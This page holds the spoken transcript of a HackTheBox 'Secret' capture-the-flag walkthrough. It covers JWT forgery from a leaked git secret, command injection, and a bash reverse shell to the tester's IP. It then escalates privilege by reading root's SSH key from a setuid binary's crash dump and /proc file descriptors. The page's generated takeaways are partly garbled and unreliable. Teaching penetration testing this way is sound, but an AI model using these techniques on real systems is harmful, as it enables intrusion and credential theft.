HackTheBox - Secret

IppSec · Beginner ·🔧 Backend Engineering ·4y ago

Key Takeaways

The video demonstrates how to exploit vulnerabilities in a web server running Node.js with Express.js framework, using tools like nmap, curl, and burp suite, to gain root access on HackTheBox - Secret. It covers topics such as API security, JWT token authentication, and file descriptor manipulation.

Full Transcript

what's going on youtube this is ipsec we're doing secret from hack the box which is all about secret ways to extract information from applications it starts off with a web server running node.js specifically the express.js framework and it's pretty bare it's just a api with some documentation so you can play around with the api create users and understand how it works and pretty much get the impression that it just uses jwt tokens to authenticate users there's also a link to download the source code and inside of that source code is a get file that exposes previous commits with the secret key used to sign jwts so you can forge a token become an admin user there's an endpoint on the app that allows for rce get shell in the box and then look around on it find a custom set uid file and its source code and essentially what it does is opens a file and then shows you how many lines words and characters it is and it allows you to do crash dump so you just open the file kill the application with the seg fault and then read the crash dump so with that being said let's jump in as always we start off with the nmap so dash sc for default scripts sv enumerate versions oh a output all formats bring the nmap directory and call it secret and then the ip address of 1010 11.120 this can take some time to run so i've already ran it looking at the results we have just three ports open the first one being ssh on port 22 and its banner tells us it's an ubuntu server then we have http on port 80. its banner tells us its engine x running on ubuntu and we have the http title of dumb docs then we also have http 1.3000 it's running node.js the express middleware which is a framework for node.js and its title is also dumb docs so both of these are identical so this can tell me a lot of things most likely it's probably the same thing and engine x is just being a reverse proxy to node.js and node.js instead of being configured to listen on 127.001 it was configured on all host so you can access either interface typically when you set up a server you'd want to configure like whatever the application is to be listening on a file descriptor and not a tcp socket because tcp does add the overhead with the three-way handshake so if you access it on engine x you do a three-way handshake to engine x and it's a reverse proxy over to port 3000 and it does another handshake over 127.001 and that just adds extra time so it's really better to configure it with a file descriptor so you don't have all that extra overhead and it's a little bit quicker the other thing this could just be like node.js running in a docker and engine x pointing to it this could be a development version this could be the production version so we probably should check out both if we get stuck because one may have different features than the other and then finally maybe there's some like weird bug where if engine x is sitting in front of node.js it opens up some exploit attacks like if this was port 8080 and tomcat and they had both the same things i would be trying that tomcat like server side request forgery to access the management interface but um at this point i'm thinking i've probably over thought it i'm just explaining all the things that go through my head and we should um just go take a look at the actual application before we start theorizing exactly how to attack it so we go to 127 10 10 11 120 we get dumb docs in this page check out 3000 as well and it looks like they are identical so nothing too interesting here i do notice we can download source code so we probably should do that and there's also let's see github links this is not there we have a live demo that does go to a 404 uh introduction looks like we have documents so all these links go to slash docs and they're just at different pages so if we send a post request to api user register uh it gives us the user so let's try this real quick um i'm going to open this up send this i wish turn intercept on we want to convert to a post request i'm just going to change request method we hit what is it api user register and then it wants us to send this json body and i'm going to change actually we won't change it first let's see what we get i'm guessing i'm going to error because we're saying it's url encoded and we're passing json but let's just see what happens uh 404 i'm going to try changing this to be json still a 404 uh did i type that i don't know how i missed that e see we send this email already exist so if i do um root ipsec dot rocks and i do the user ipsec and what was this i want to do this just to see if this would work it says name is required so node.js can't like isn't processing this because it's expecting it as like name equals and email equals like that when you do x url encoded so let's change this over to json the content type is extremely important and we create the user ipsec so if i look at this it tells us yep that is exactly it there is a login so what i'm going to do i'm going to double click up there create user and then i'm going to try a login request so i'm going to do slash login and then we can just change that to be ipsec ipsec dot rocks see delete that ipsec ipsec dot rocks email is wrong i type in my name ipsbeck or ipspec maybe um does it know my email is wrong oh root at ipsec.rocks uh it's been a long day so we get this token back so now what does the json say if you get the auth token it should look like this awesome and we can go over to jwt dot il and see what it is so jwt dot io let's turn brip suite off there we go we can copy this token paste it in and we see id name email iat so the very first thing i'm probably going to try we can say this one is login um what was it like admin at actually instead of saying email i'm going to try um name can i just log in with a name because a lot of times apis will make things interchangeable they may not tell you but no email is required so we can't log in with the name and we don't know the admins email if we look at dumb docs i don't see anything that would leak an email oh it says email me and then it goes nowhere so we don't have an email address but we did download the source code so i'm going to move downloads and what did we download it as files.zip to our current directory let's make directory source and we can unzip files.zip and oh i saw a lot of things one thing that did stick out was a get directory so we can look at the get commits but first i'm just going to run codium and we're going to take a look at this application so file open folder local web we're here we can look at env we have a token secret of secret we can take a look at our jwt il and right now this is the payload that came from the web server if i put in secret we can see secret verified i did not expect that let's see oh um this is creating the secret i thought this would be testing it so we can try the secret of secret and send this back to the endpoint let's see i don't know how to exactly do this if you're not an admin somebody hit api priv we should be able to log in so let's go here and then make another one and call this priv and this is let's see a get request to api priv so i'm going to change the request method do api priv we get access denied we can do the normal jwt thing of authorization bearer the jwt token access denied if your admin you will get if you're a normal user i should get i'm a normal user so something is wrong here so let's take a look at the source to see exactly how this is going or maybe i copied the wrong thing but looking at index.js we can see [Music] the priv route is defined here we got where the downloads is but here where that says app.use this is how it actually maps everything so we can see api user is mapped to auth route which is routes auth so if we go to routes auth we have everything here so we hit this register endpoint we've hit this login endpoint and let's see upon logging in we do validation find one it wants us to set a header of auth token it looks like um let's see prive request send name see verify token let's go to this function and yeah it's using the header auth token so it's not using the standard jwt header it's using auth token so let's try this and we get invalid token which is fine so i'm going to copy this token go here paste and i'm a normal user so now that token probably came out of here so let's see came out of here i was looking at screenshot jwt so i'm trying to paste the secret of secret here and when we do this we get invalid tokens so we have the wrong key um we did have a get directory so i can do get log and we can see removed and for security reasons so if i do get shell on this commit we can see what the token is so i can copy this we go back over here let's change secret to be the new thing and i probably have to base64 encode this because this is definitely a base64 encoded string um let's see it is so um if thing doesn't work i'm going to click the base64 and go and try again we should have so you get rid of that line break send oh wait we need two line breaks after a git request there we go so now we can change anything so it says i am a user normal description if spec because i can't type but if i change the name to please subscribe we can now become this user we see the description please subscribe so if we go back to the endpoint the private.js it is hard coding the name the admin so if i change the name to the admin it should tell me welcome back admin so i'm going to try this name the admin copy the secret paste it in here and it says welcome back admin so let's just take a look through this code so we have a few routes api user api and slash so i'm going to take a look at priv route because we've already dug through this auth function and we can now become any user we want so authenticating isn't a thing for us anymore and if an application ever uses jwts and you do a pen test you extract the source code definitely recommend they rotate those keys because there have been times when i do engagements i say rotate this key because it's been leaked i go back for the next engagement they don't and i just go back to my notes pull the key and like oh you patched everything i said but you didn't prevent me from just being able to forge my own token so um this was a pretty quick test right because i just instantly forged my way back in as an admin so this is forgot but forgot doesn't look like it's really that interesting i think get priv um if the name is admin description path to binary what is that um i'm going to try that real quick so forgot dot js what loads this forgot not there probably an auth right what the heck get slash priv what was this api priv is that this am i hitting that let's see edit find in files slash priv let's see index forgot private so this is what i'm hitting i don't know what this forgot that js is uh edit find and files forgot.js i don't know if anything's actually calling this this may just be a dead file because i'm looking at files looking for forgot.js and nothing includes this so let's go to the next one private.js so we have this private point nothing interesting there there is a logs endpoint and if we look at this we have if name is the admin that's going to do a get logs and do a get log dash dash one line and file we look at what defines file it is request query file so this is coming from the client this is our http request so it's getting our query of the parameter name file and then passing it over to exec so exact just like shell um it's like executing bash get log one line user input so this should be trivial to get code execution on so let's see um where do we have priv so i'm just going to change this we're going to move this over here i'm going to call this log and we get api log uh endpoint let's see file is equal to um test see is it api priv log oh slash logs there we go so we see command get log one line test so if i do id there we go we have now executed id on this box so the next thing to do is send a reverse shell so i'm going to go up to directory so we're back here and then i'm just going to run script shell.out and all this gonna do is send all like my reverse shell output to this file so i have a good log of things i did and i'm gonna do nclvnp9001 and let's do echo dash n bash dash c bash actually i'm going to send this in base 64. so um we just do bash dash i dev tcp 10 10 14 8 9 000 1 0 and 1. and then base 64-w 0 and what i want to do is get rid of this plus and these equals so i'm going to think the plus comes right after this dash i and just add a space there and we've changed that we want to get rid of this plus now that's probably going to be right around here and there we go and the reason why i was getting rid of those pluses is because plus and url is also space so it can be a bad character and i just like being avoiding as many bad characters as i can so if i do echo dash n paste this pipe it over to bash dash i think if i just pipe it over to bash and we highlight this control u to url encode that you can see the spaces were converted to pluses so if i left the plus in my base64 he would treat it as a space which not good we send this it got killed and did not send us the shell huh let's see i'm going to control you to get back to where we were um doesn't seem to be working i'm just going to control shift you and i'm going to paste this and see if i get a callback i don't and i realized base64-w0 or basics4-d to decode it the things you forget sometimes still does not work so let's copy this go here paste it why do i have two i should not have two there so there we go that works let's just make sure i did not have two in burp suite so paste ctrl u and see lvmp9001 send it let's see i don't know where they had an equal at the end there we go and now we have a reverse shell i'm not sure exactly what i did it looked like i had a key and converted this whole thing to base 64. is that a thing base64 i probably hit control b and converted because i saw the equal there was like wait i was going away from bad characters why do i have that so that's probably what i had done there but we have a reverse shell now so let's do python 3 dash c import pty pty spawn pen dash like that stpy raw minus echo foreground and then let's see we can export term is equal to x term and we have just a good reverse shell the very first thing i notice here is we exploited a web service and we're now a user which is bizarre but because we're a user i can just grab de sith for etsy passwd and we see i do have a shell of bin bash so i didn't have to do all this like reverse shell thing because i could just go into my home directory and then we make the directory ssh and drop an authorized key file here so if i just do ssh keygen dash f sith and we cat deseth.pub we can grab our key and v authorized keys paste this in and then chmod 600 de sith and ssh dash i to sith at 10 10 11 120 and we gotta say to sith again for the user so we use his key here and now we're using him to log in and there we go so now we have an even better shell that's more reliable if we get kicked off we can just get back in the downside is if i run a w command i can see i'm logged in but on the flip side if you do like a psef forest you can see uh the reverse shell also sticks out so both ways are neither stealthy um if you want to be stealth you probably have to execute a binary on the box and these videos don't really focus on stealth so let's just go on um let's see the very first question i have is port 80 versus 3000 is there a difference so i'm going to go to etsy engine x and then let's go to sites available sites available look at default and let's go to the configuration we can see location slash so everything on this server is just going to be proxy passed to localhost 3000 so they're the same exact application um no i guess like i said before the um node.js application should be listening on localhost it's configured to go to 127.001 but i bet if we do ss lntp we can see it's listing on all hosts so probably how they're using to persist this express application on boot should be coded to listen on localhost um if i had a guest they're using pm2 because that's just generally what node modules do uh yeah we have pm2 here um let's see i don't know exactly where to go there's a binary somewhere uh pm2 h see is there a list i really don't know exactly what i'm doing here um there's a config that you could do with pm2 to make it listed on localhost but that's not important um i'm going to go run lin p's and i've already opened up the github page to this because i was looking at it and lin p's did change to also include a binary so we can either just download the sh script or we could execute it as a go link binary if i copy this link we go let's see make dirt dub dub dub we can w get this and we can also w get linps.sh and this is just different ways to execute lynn p's you still got the bash script whoops that does everything but there is this lin ps linux amd64 that is just a go binary that executes linps.sh so i'm going to do the elf binary just because there's really no reason why i'm going to choose to do that other than i want to see this right so i'm going to [Music] uh w get let's go end up shm w get 10 10 14 8 8 000 1 lin p's linux md64 chmod plus x and we will execute this i'm just going to run a time command here so it tells me how long it took for it to run generally it can take anywhere from like one to five minutes so i'm just going to run this and i will resume the video when it's done and not even two minutes later we have the file completed so i'm just going to go to the top my output and let's go over what uh lin p says so the very first thing is i see something highlighted vulnerable to cve 2021 4034 which is under pseudo so if i grab the cd or not grip but google the cve uh we can see it is prone kit so it's kind of weird that it's listed under sudo and i don't believe like i don't know a good way to check for pound kit other than exploiting it but i'm 99 sure that was patched so i'm just going to move on uh because i remember when pound kit was released we went back and patched all active machines so um that's why i'm not going down that route the main issue with like it detecting it probably is it's depending on the pk exec version and for some reason with pound kit the creators of pk exec or paul kit didn't update the version numbers so even if you do a pk exec v to show the version number um it's both vulnerable and not it's really hard to test for that vulnerability without actually exploiting it so that's probably why it went off that was processes cron jobs we see um it's highlighting the sith but this is at reboot so upon rebooting the machine it's going to start the pm2 thing under the sith so nothing interesting there systemd path socket files sockets listening d bus config i'm just looking for highlighted things until we get to an interesting section we see logons software information w get it's only highlighted because that's how i was getting to the top of the output you can see one result here i don't want to control c because i may like kill my whole um like go to the bottom of the output so that's why that was highlighted let's see engine x fast cgi rsync config nothing looks interesting still nothing interesting tmuck sessions it checks for a lot of things looking at github files we've already looked at those cache bind that's dns engineering file set uid these are always good to look at so pk exec uh we already talked about that one pseudo pass wd there is opt count which is an unknown set uid binary so chances are we should look at opt count just looking through the rest of these to make sure there's nothing but um if i go into opt we can see there is a count binary and we also have code.c which i'm going to guess is the source to this if i execute count enter source file or directory name i'm going to do etsy shadow and we see it's counting everything save the results if i do yes path let's do opt i'll call it ipsec could not open up dipsec for writing let's touch ipsec or touch temp ipsec let's try this again let's do etsy shadow it's counting characters words lines we save it to temp ipsec by cat temp ipsec oh it's just saving those results so i just want to try this one more time i should have looked at the owner of temp ipsec if it changed it actually no um never mind the owner wouldn't change because i created the file um etsy shadow save the results temp ipsec so when it's writing this file it's interesting um it obviously has a set uid call so it can read shadow because it gets words and lines um we could probably get turtle characters or cells if we just do like lsla on etsy shadow 1187 so the total characters isn't interesting because we could pull that anyway but the words and lines is interesting because it has to use a set uid call to get up there up to their permission to be able to see that but then when it writes the file it gets rid of that set uid call so we can't write anything so let's take a look at the source code so code.c and let's see ask your cat directory is link so this is just opening the file close directory let's see file count and main scan f so it's enabling the ability to do a core dom so if we start this and then use a kill command to kill the process with like a seg fault then um it should rate the core dump and we get the data because that's what this is doing so i'm going to try that real quick let's do count and i'm going to kill it from my reverse shell so let's do etsy shadow uh first i have to type it correctly and then let's see kill h let's see kill linux create core dump you limit c let's see dash three so psef grep on count kill dash three the pid and it quit and it says core dumped so now we just have to find where the dump is uh it's probably let's see var crash maybe yep var crash now can we read the crash log cd ver crash see is that me i don't think that's me i don't know what i'm doing i just want to run a date to look at the box so let's see those were created october and it is not october so that's probably testing the box would it write that crash to find slash to dab null grab crash see core grab dump man that's a lot of stuff i really think it would go in for a crash but there's nothing recent there um let's do a man on kill maybe we did it wrong let's see we have list yeah let's do kill because we have different numbers we can do like nine uh kill dash l11 will translate 11 i don't even know there was an 11 um let's just do kill dash capital l so we can see everything so we did a sig quit so we just told it to quit um we didn't actually crash it so i'm gonna try 11 to seg fault it normally i just do the 9 to kill it but you can see there's a lot of other ways like you can terminate a program so i'm going to dot slash count etsy shadow we read it now let's do ps ef grep count kill dash 11 and we can kill this process we see segful lsla ver crash there we go we have a new crash um and we can read it so if i go into ver crash we do file you can see it's ascii text so i wonder if i grab root out of this uh count dot 1000 got i what is this crash dump proc map there's a lot of base64 here so this is a crash report um let's see app support unpack so we're gonna unpack the crash report and target directory let's just do dev shm uh make dirt dev shm report we can dump it there and now if we go here it did all like the base64 undoing for us so we have the core dump the architecture executable path like this is everything that would go in a dump that would get sent to ubuntu to help so if we grab root out of core dump see dash a because it's a binary file we could get the ssh key or not the encrypted password for root so now we have a way to read files so what i'm going to do is we're going to check if the ssh key for root exists so we can do dot slash count enter source or directory name let's do root.ssh id rsa it does exist because we can see it's 45 words 39 lines and before we save it to a file psef grep on count kill dash eleven three uh six one zero one four there we go go into ver crash make dirt dab shm report two let's do this unpack thing again opt count one thousand dot crash sounds good maker uh let's just put it in report two and let's go okay just less core dump and we see see we can do our strings on core dump less let's see begin there we go so all you have to do is copy this so do this to out them out or let's do grab begin on out dash a 10 oh how many lines was it lines 39 so we can say a 39 and i guess it had two extra so let's do 37 there we go we can say this is root.key if i look at it we begin we end so i should be able to adjust chmod 600 root.key sh-i root.key root at localhost and we could export this key back to our box and do it that way as well yes and we have rooted secret now there was another thing we could have done with this binary because it is set up as it is let's go back to code so cd arc code hot we can execute count let's do slash root slash dot ssh dot id rsa and we can go into the proc and let's do a psef grep count we want to go into this directory 61216 and then if we go into fd for file descriptor and we cat let's cat the last one uh commission nine cat two cat one cat zero i thought that would work cat 3 is pointed to root ssh id rsa let's see i thought we could have read that permission denied so i guess maybe this only works if we own the file in this directory so if we created a file in slash root and we were the owner of it but we couldn't access it because we didn't have permission to root but if we get a file handle open to that file then we could access it this way i believe i do want to try something else i did recently learn that we can dd things out of memory i don't know if this is a root privilege thing or not if we own it so i'm just going to try it real quick i'm assuming this isn't going to work but um just experimenting here so let's cat maps and i want to look at the heat so grab dash i heap there we go and i'm going to try to extract this piece of memory because this is also where the contents of that file is going to be so i'm going to do dd i i if for input file and there is inside of this product directory a file called mem which is just assembling to it and i really doubt this is going to work without root privilege but let's try it input file is equal to mem block size is equal to 1. we can skip like everything here so let's copy this 0x so we're skipping to this spot in memory and then we're going to count this spot minus the other one i need to do oh god where's my cursor new that sucks there we go darn demox oh this is going to suck um let's see stty dash a let's do rows 26 columns one of 24 105. stty rose 26 calls 105 yep there we go so now i don't have that bug where my cursor jumps because this one i'm in is a reverse shell this is the ssh so i just had to fix that piece of my shell so we got this one let's go here 0x like this then output file is equal to temp heap let's see this fail yeah permission denied if we are root we would have been able to do that um [Music] so i just want to see something real quick let's do that ssh uh we wrote the key to what dev report two dev shm report two if we ssh here so i'm going to um touch ipsec or ch own de sith de sith to ipsec so we have the file ipsec in here i'm going to echo please subscribe to the file so now the sith owns this file in root and i'm guessing we could have done it with like dot profile as well because that's world readable um bash history isn't so we probably could dealt with profile we'll see so cat root ipsec doesn't work we don't have the ability to go into the root directory so if i do the count thing again and we do the source let's do root ipsec ps ef grep on count then cd proc 61446 cdfd we can see there's a handle to root ipsec so if i try to cat root ipsec i can't but if i count this file handle i can and the reason why is this application did not close the file yet let's try was it root slash dot profile root dot profile so we see the file handle is open we have to go back to the directory cd proc 6 proc661452 cdfd we can see that file handle if i try to cat root dot profile i can't but if i cat 3 i can because i do have permission to read the file i just don't have a file handle to it and the c code is doing a set uid let's see set uid it's doing a set uid so it can get a file handle open to that file so um think of it like this file descriptor thing well it just went away because i closed the file it's pointed to specific spots on the disk i guess and because it's pointed to the spot on the disk i no longer need to know the root folder like i didn't know no need to oh my god i can't talk no longer need to traverse into the root folder to find out exactly where on the disk the file exists because i have the handle to it so that is why that thing works um maybe you learned something through file descriptors maybe i just completely over complicated it i don't know um but yeah that's another potential thing of this i don't know if there's anything sensitive in the root directory that you could have used to um abuse it so if i do let's see dev shm report two and we do that ssh again i really don't think there's anything interesting in this directory that we could abuse root.text isn't 777 so we couldn't just steal that another thing let's see let's go into opt let's just do dot slash count real quick and under the source i'm going to do root root.text 33 characters um i probably should do etsy passwd because this is just going to be a random md5 summon going through the heap is going to be a pain to find that so we're doing shadow we have it open this should exist in my program's heap right now so if i do a ps ef grep on count we can go proc six one five nine seven then let's do grep heap on maps and let's try this dd command again so dd input file is equal to mem block size is equal to 1 skip we want to skip this so copy 0x so now we're at this spot in memory then we can say count is equal to the sub like the ending size minus the beginning size then we just do output file is equal to temp heap so now since i'm root i should have privilege to do this if i put a backslash x here there we go so now we wrote the heap by cat heap we now also have the passwd file here so just like the core dump we can see what it like the output of it some memory stuff and then shadow so that will be the video i hope you guys enjoyed it take care and i will see you all next week

Original Description

00:00 - Into 01:04 - Start of nmap talking about seeing two ports having the same HTTP Banner 03:20 - Checking out the webpage to discover source code and some docs 04:00 - Always RTFM, Playing with the API to Register a user, login, and check out privilege level. 05:50 - Renaming our burp repeater tab by just double clicking on the number 07:30 - Trying to login with a name instead of email 10:10 - Testing our login token to find out it uses JWT's in a non-standard way 10:50 - Analyzing the source code to see the token is used in a header called "auth-token" 12:40 - Looking at git commit history to see there is a hard coded secret in an older commit and forging a token 13:40 - Changing our tokens user, going back to the source code and seeing "theadmin" is a hardcoded administrative user 14:30 - Talking about the importance of rotating secrets in a web application 16:30 - Analyzing the private.js which shows a logs endpoint that is vulnerable to RCE 17:50 - Testing command injection and getting a reverse shell 22:00 - Noticing we are a user on the box, seeing our shell is /bin/bash, dropping a SSH Key for a second way into the box 23:40 - Checking NGINX Configuration to see if there is any difference between the two websites (port 80 and 3000), there isnt. 25:20 - Running LinPEAS, discovering a custom SetUID Binary called count 30:00 - Running the custom count binary against /etc/shadow, discovering it can read files as root, but not write files as root 31:57 - Examining the source code, to discover it allows for dump files to be created 33:15 - Failing to kill the linux process with the correct signal 34:50 - Pulling up the man page to kill and listing all signals, then killing the process with a Segfault (11) 36:40 - Using apport-unpack to extract the crash report into readable files 37:23 - Examining the coredump to discover the file read is there! Then doing the same thing with an SSH Key to get root on the box 40:00 - Showing how file descriptors (/proc/pid/f
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

This video teaches how to exploit vulnerabilities in a web server running Node.js with Express.js framework, using tools like nmap, curl, and burp suite, to gain root access on HackTheBox - Secret. It covers topics such as API security, JWT token authentication, and file descriptor manipulation.

Key Takeaways
  1. Run nmap with default scripts to enumerate versions
  2. Send a POST request to api/user/register to create a user
  3. Use JWT token to authenticate and access privileged routes
  4. Manipulate file descriptors to access files without root privileges
  5. Use dev shm report to find sensitive information
  6. Abuse root.text to access password file
💡 The video demonstrates how to use file descriptor manipulation to access files without root privileges, which is a key concept in exploiting vulnerabilities in web servers.

Related AI Lessons

Chapters (23)

Into
1:04 Start of nmap talking about seeing two ports having the same HTTP Banner
3:20 Checking out the webpage to discover source code and some docs
4:00 Always RTFM, Playing with the API to Register a user, login, and check out pri
5:50 Renaming our burp repeater tab by just double clicking on the number
7:30 Trying to login with a name instead of email
10:10 Testing our login token to find out it uses JWT's in a non-standard way
10:50 Analyzing the source code to see the token is used in a header called "auth-to
12:40 Looking at git commit history to see there is a hard coded secret in an older
13:40 Changing our tokens user, going back to the source code and seeing "theadmin"
14:30 Talking about the importance of rotating secrets in a web application
16:30 Analyzing the private.js which shows a logs endpoint that is vulnerable to RCE
17:50 Testing command injection and getting a reverse shell
22:00 Noticing we are a user on the box, seeing our shell is /bin/bash, dropping a S
23:40 Checking NGINX Configuration to see if there is any difference between the two
25:20 Running LinPEAS, discovering a custom SetUID Binary called count
30:00 Running the custom count binary against /etc/shadow, discovering it can read f
31:57 Examining the source code, to discover it allows for dump files to be created
33:15 Failing to kill the linux process with the correct signal
34:50 Pulling up the man page to kill and listing all signals, then killing the proc
36:40 Using apport-unpack to extract the crash report into readable files
37:23 Examining the coredump to discover the file read is there! Then doing the sam
40:00 Showing how file descriptors (/proc/pid/f
Up next
This Cop Was Held Accountable For His Brutality! #police #lawyer
Hampton Law
Watch →